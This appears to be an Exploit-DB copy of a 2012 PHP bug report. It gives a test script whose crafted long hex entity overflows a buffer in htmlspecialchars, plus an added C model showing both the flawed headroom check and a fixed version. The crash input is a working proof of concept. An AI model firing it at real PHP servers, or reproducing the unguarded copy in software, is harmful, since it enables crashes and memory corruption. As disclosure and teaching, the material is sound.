PHP 5.4SVN-2012-02-03 – htmlspecialchars/entities Buffer Overflow

  • Author: cataphract
    Date: 2012-02-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18458/
  • From: cataphract
    Operating system: Any
    PHP version: 5.4SVN-2012-02-03 (SVN)
    Package: Reproducible crash
    Bug Type: Bug
    Bug description: Buffer overflow on htmlspecialchars/entities with $double=false
    
    Description:
    ------------
    Long entities can cause a buffer overflow because the loop only guarantees
    40 bytes available in the beginning.
    
    Test script:
    ---------------
    <?php
    echo
    htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',
    ENT_QUOTES, 'UTF-8', false), "\n";
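
The bug class described in the report, shown as an added example in C; it is not PHP's source and not part of the original report. It is a simplified escaper that keeps the fixed 40-byte per-iteration headroom check and adds a length-aware reservation before the verbatim entity copy. The names `escape_no_double`, `reserve`, `hex_entity_len` and `HEADROOM` are hypothetical, and this model recognises only hex entities.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define HEADROOM 40 /* per-iteration guarantee named in the report */

/* Length of a hex entity "&#x<hex>;" at s, or 0 if there is none. */
static size_t hex_entity_len(const char *s, size_t n) {
    size_t i = 3;
    if (n < 5 || s[0] != '&' || s[1] != '#' || (s[2] != 'x' && s[2] != 'X')) return 0;
    while (i < n && isxdigit((unsigned char)s[i])) i++;
    return (i > 3 && i < n && s[i] == ';') ? i + 1 : 0;
}

/* Grow *buf until at least `need` bytes are free past `len`. */
static int reserve(char **buf, size_t *cap, size_t len, size_t need) {
    if (*cap - len >= need) return 0;
    char *p = realloc(*buf, len + need + 128);
    if (p) { *buf = p; *cap = len + need + 128; }
    return p ? 0 : -1;
}

/* Escape " and & but copy existing entities verbatim (double-encode off).
   Returns a malloc'd NUL-terminated string, or NULL if allocation fails. */
char *escape_no_double(const char *in, size_t n) {
    size_t cap = 128, len = 0, i = 0;
    char *out = malloc(cap);
    while (out && i < n) {
        /* The flawed pattern stops at this check: HEADROOM bytes per pass. */
        if (reserve(&out, &cap, len, HEADROOM) < 0) { free(out); return NULL; }
        size_t e = hex_entity_len(in + i, n - i);
        if (e) {
            /* Hardened step: the entity length comes from the input and can
               exceed HEADROOM, so size the buffer for it before copying. */
            if (reserve(&out, &cap, len, e + 1) < 0) { free(out); return NULL; }
            memcpy(out + len, in + i, e); len += e; i += e;
        } else if (in[i] == '"') { memcpy(out + len, "&quot;", 6); len += 6; i++; }
        else if (in[i] == '&') { memcpy(out + len, "&amp;", 5); len += 5; i++; }
        else out[len++] = in[i++];
    }
    if (out) out[len] = '\0';
    return out;
}
```

Without the second `reserve` call, the `memcpy` of an entity longer than the remaining headroom writes past the end of `out`, which is the condition the test script triggers.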